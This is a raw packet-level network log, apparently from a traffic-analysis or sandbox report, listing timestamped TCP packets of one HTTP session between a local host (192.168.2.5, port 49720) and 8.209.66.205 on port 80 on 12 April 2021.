Apr 12, 2021 15:12:20.145924091 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145937920 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145942926 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.145950079 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145975113 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.145992041 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146003008 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146020889 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146045923 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146056890 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146061897 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146070957 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146080017 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146095037 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146119118 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146136045 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146142006 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146142006 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146166086 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146183968 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146188974 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146189928 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146223068 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146234989 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146239042 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146250010 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146274090 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146291018 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146296978 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146298885 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146322012 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146342039 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146347046 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146348000 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146370888 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146394968 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146399021 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146404982 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146425009 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146450996 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146472931 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146475077 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146477938 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146498919 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146522999 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146522999 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146529913 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146547079 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146570921 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146584988 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146590948 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146595001 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146624088 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146645069 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146648884 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146651030 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146672010 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146697044 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146716118 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146719933 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146720886 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146744013 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146765947 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146769047 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146773100 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146792889 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146816015 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146821976 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146821976 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146851063 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146874905 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146883011 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146888018 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146898985 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146922112 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146939039 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146945000 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146945000 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146967888 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146991014 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.146991968 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.146996021 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147022009 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147037029 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147042990 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147048950 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147073984 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147094965 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147098064 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147099972 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147123098 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147145987 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147156954 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147162914 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147170067 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147193909 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147205114 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147223949 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147243977 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147248030 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147263050 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147268057 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147291899 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147310972 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147316933 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147339106 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147366047 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147372007 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147377968 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147389889 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147418976 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147444963 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147444963 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147450924 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147469044 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147492886 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147516012 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147524118 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147527933 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147538900 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147562027 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147586107 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147599936 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147605896 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147614002 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147639990 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147644997 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147663116 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147686005 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147707939 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147710085 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147715092 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147730112 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147753000 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147775888 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147784948 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147790909 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147804976 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147830009 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147850990 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147852898 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147855043 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147876024 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147898912 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147922039 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147929907 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147934914 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147944927 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147969007 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.147981882 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147985935 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.147998095 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148022890 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148046017 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148057938 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148062944 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148068905 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148092985 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148114920 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148133993 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148138046 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148139000 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148161888 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148190022 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148190022 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148216009 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148237944 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148241997 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148247004 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148261070 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148283958 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148299932 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148303986 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148305893 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148329973 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148353100 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148356915 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148360014 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148380995 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148406982 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148417950 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148423910 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148430109 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148453951 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148468018 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148473024 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148477077 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148499966 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.148530006 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148535013 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.148660898 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.186744928 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.186774015 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.186795950 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.186820984 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.186876059 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.186894894 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.187087059 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.189814091 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.189841032 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.189862013 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.189888000 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.189898014 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.189910889 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.189933062 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.189955950 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.189979076 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190001011 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190001011 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190007925 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190025091 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190052032 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190067053 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190109968 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190121889 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190126896 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190134048 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190157890 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190179110 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190201998 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190217972 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190222025 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190223932 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190251112 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190274000 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190296888 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190305948 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190311909 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190319061 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190340996 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190361977 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190387011 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190391064 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190395117 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190409899 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190432072 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190454960 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190474033 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190475941 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190478086 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190498114 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190520048 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190541029 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190550089 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190556049 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190566063 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190589905 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190613031 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190629005 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190634012 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190634966 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190658092 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190680027 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190702915 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190718889 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190723896 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190725088 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190749884 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190772057 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190788984 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190793991 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190794945 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190818071 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190840006 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190860987 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190869093 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190874100 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190884113 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190905094 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190929890 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190952063 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190953016 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190957069 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.190974951 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.190999031 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191016912 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191021919 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191021919 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191045046 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191067934 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191090107 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191111088 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191114902 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191116095 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191138029 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191159964 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191180944 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191190004 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191195965 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191203117 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191236973 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191257954 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191279888 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191287041 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191292048 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191302061 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191323996 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191345930 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191348076 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191351891 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191370964 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191395044 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191412926 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191417933 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191428900 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191441059 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191462994 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191463947 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191488028 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191509962 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191530943 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191533089 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191557884 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191581011 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191589117 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191596031 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191601992 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191613913 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191625118 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191648006 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191663027 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191669941 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191693068 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191715002 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191734076 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191740990 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191766024 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191777945 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191787004 CEST	49720	80	192.168.2.5	8.209.66.205
Apr 12, 2021 15:12:20.191787958 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191811085 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191832066 CEST	80	49720	8.209.66.205	192.168.2.5
Apr 12, 2021 15:12:20.191843987 CEST	49720	80	192.168.2.5	8.209.66.205
